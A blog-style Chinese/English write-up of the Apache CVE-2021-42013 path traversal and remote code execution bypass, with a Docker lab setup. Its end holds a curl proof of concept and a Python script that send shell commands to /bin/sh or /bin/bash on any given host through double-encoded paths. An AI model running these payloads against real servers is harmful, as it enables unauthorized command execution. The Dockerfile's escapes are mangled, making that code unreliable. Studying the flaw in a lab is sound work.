Apache任意文件读取补丁绕过（CVE-2021-42013）

This past Monday, October 4th, Apache disclosed a vulnerability  introduced on Apache HTTP Server 2.4.49 known as CVE-2021-41773. At the  same time, update 2.4.50 was released, fixing this vulnerability. The  vulnerability allows an attacker to bypass Path traversal protections,  using encoding, and read arbitrary files on the webserver’s file system.  Both Linux and Windows servers running this version of Apache are  affected.

This vulnerability was introduced on 2.4.49, on a patch that aimed to  improve performance in the validation of the URL. The new validation  method could be bypassed by encoding the ‘.’ character. If the Apache  webserver configuration is not set to “Require all denied”, the  exploitation is relatively trivial. By encoding these characters and  modifying an URL with the payload, a classic path traversal is possible.

Due to the simple exploitation of this vulnerability there are  already several public Proof of Concept scripts available on the  internet. A simple demo can also be made using curl, as the attacker  needs only to go back through enough directories to access the root of  the server with a slight modification that disrupts the normalization of  the URL.

It is also possible to perform Remote Code Execution if mod_cgi is  enabled by using a URL prefixed by /cgi-bin/, which is a functionality  not used in modern web technologies. However, many older web deployments  still rely on it to function.

On October 5, 2021 and October 7, 2021, the Apache Software Foundation released two security announcements for the Apache HTTP Server that disclosed the following vulnerabilities:

• CVE-2021-41524: Null Pointer Dereference Vulnerability

• CVE-2021-41773: Path Traversal and Remote Code Execution Vulnerability

• CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)

For descriptions of these vulnerabilities, see the Apache Security Announcement. For additional information, see the Cisco TALOS blog post, Threat Advisory: Apache HTTP Server zero-day vulnerability opens door for attackers.

概述

Apache HTTP Server 2.4.50 中对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护，则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本，则可以允许远程代码执行。这些漏洞已被广泛利用。与CVE-2021-41773类似，此漏洞由不安全的配置触发，即，如果网站配置中，将 根目录 / 配置为

Require all granted

其实说白了就是/../../../../../bin/sh两次url编码的结果的，上一个漏洞是一次url编码，上一次的修复只是过滤了一些简单的字符仅此而已。有点像ctf的绕过题目，开发和黑客的斗智斗勇，可以去研究一下补丁的修复的方法。

复现环境搭建

https://hub.docker.com/r/blueteamsteve/cve-2021-41773

自己本地搭建的docker

FROM httpd:2.4.50

RUN set -ex 
    && sed -i "s|#LoadModule cgid_module modules/mod_cgid.so|LoadModule cgid_module modules/mod_cgid.so|g" /usr/local/apache2/conf/httpd.conf 
    && sed -i "s|#LoadModule cgi_module modules/mod_cgi.so|LoadModule cgi_module modules/mod_cgi.so|g" /usr/local/apache2/conf/httpd.conf 
    && sed -i "s|#Include conf/extra/httpd-autoindex.conf|Include conf/extra/httpd-autoindex.conf|g" /usr/local/apache2/conf/httpd.conf 
    && cat /usr/local/apache2/conf/httpd.conf 
        | tr 'n' 'r' 
        | perl -pe 's|<Directory />.*?</Directory>|<Directory />n    AllowOverride nonen    Require all grantedn</Directory>|isg' 
        | tr 'r' 'n' 
        | tee /tmp/httpd.conf 
    && mv /tmp/httpd.conf /usr/local/apache2/conf/httpd.conf

然后运行如下命令：

docker build -t  httpd:2.4.50rce .
docker run  -d -p 7006:80 httpd:2.4.50rce

复现结果

poc如下：
curl --data "echo;id" 'http://xxx.xxxx:XXX/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

脚本化

import requests
import sys

host = sys.argv[1]
port = sys.argv[2]

url_dir = 'http://'+sys.argv[1]+":"+sys.argv[2]+'/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/bash'
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',
    'Accept-Encoding':'gzip, deflate',
    'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
}
data = "echo;echo QWERTYUI "
s = requests.Session()
req = requests.Request('POST',url_dir,data = data,headers=headers)
pred = req.prepare()
pred.url = url_dir
reqPost = s.send(pred,verify=False,proxies={"http":"127.0.0.1:8080"})
if "QWERTYUI" in reqPost.text:
    print "SUCCESS"
else:
    print "Fail"

参考链接

https://www.o2oxy.cn/3740.html

https://downloads.apache.org/httpd/CHANGES_2.4

https://mp.weixin.qq.com/s/A3zm4ArkYKfrTcgckQmo_w

https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/cve-2021-41773-apache-web-server-path-traversal/

https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html